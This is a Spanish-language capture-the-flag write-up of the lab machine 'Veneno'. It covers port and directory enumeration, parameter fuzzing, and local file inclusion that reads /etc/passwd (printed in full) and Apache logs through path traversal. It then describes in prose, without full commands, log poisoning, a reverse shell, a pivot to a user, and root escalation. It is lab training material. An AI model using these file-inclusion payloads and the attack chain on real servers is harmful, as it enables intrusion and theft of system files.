MAQUINA VENENO (Fuzzing parámetro LFI RCE log poisoning)
MAQUINA VENENO (Fuzzing parámetro - LFI RCE - log poisoning)
Enumeración de puertos, servicios y versiones.
nmap -p- --open --min-rate 3000 -n -Pn -sSCV 172.17.0.2 -oN fullservice.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 89:9c:7b:99:95:b6:e8:03:5a:6a:d4:69:69:4a:8d:35 (ECDSA)
|_ 256 ec:ec:90:44:4e:66:64:22:f6:8b:cd:29:d2:b5:60:6a (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumeración de directorios
nmap -p80 --script=http-enum.nse 172.17.0.2 -oN directory.txt
80/tcp open http
| http-enum:
|_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.58 (ubuntu)' MAC Address: 02:42:AC:11:00:02 (Unknown)Feroxbuster
feroxbuster -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-1404
GET
9l
31w
272c Auto-filtering found 404-like response and created new filter
403
GET
9l
28w
275c Auto-filtering found 404-like response and created new filter
Escaneo de parámetros para http://172.17.0.2/problems.php?"FUZZ=/etc/passwd"
Localización del /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin messagebus:x:100:101::/nonexistent:/usr/sbin/nologin systemd- resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin sshd:x:101:65534::/run/sshd:/usr/sbin/nologin carlos:x:1001:1001:,,,:/home/carlos:/bin/bash
Búsqueda de mas directorios, /var/log/apache2/error.log = log poisoning
000000648:
200
530 L
6261 W 73529 Ch
"/var/log/apache2/access.log"
000000650:
200
528 L
6237 W 73251 Ch
"../../../../../../../var/log/apache2/access.log
LOGPOISONING
**Log Poisoning** (envenenamiento de logs) es una técnica utilizada por atacantes para **inyectar código
Como se pueden ver los log con curl voy a injectar codigo PHP en los logs.
La petición fue aceptada, por ende ahora puedo alojar una revershell.. en este caso la mia ya fue alojada (ivan.php)
Fui a la carpeta UPLOAD y allí se encontraba alojado el archivo.php
Me puse a la escucha con netcat y dispare la revershell
En /var/www/html se encuentra alojado este archivo.
Con find busque algún archivo de texto que sea de Carlos.
Se pivoteo a Carlos mediante su password.
Se listo la carpeta HOME de Carlos y hay muchas carpetas con "ls -laR" liste todo el contenido donde encontré una imagen.
Como tengo python3 instalado en la maquina victima, aloje un servidor para descargar la imagen.
En la kali descargo el archivo/
Con exiftool veo los metadatos de la imagen.
Use el siguiente comando y logre acceder como root.
Last updated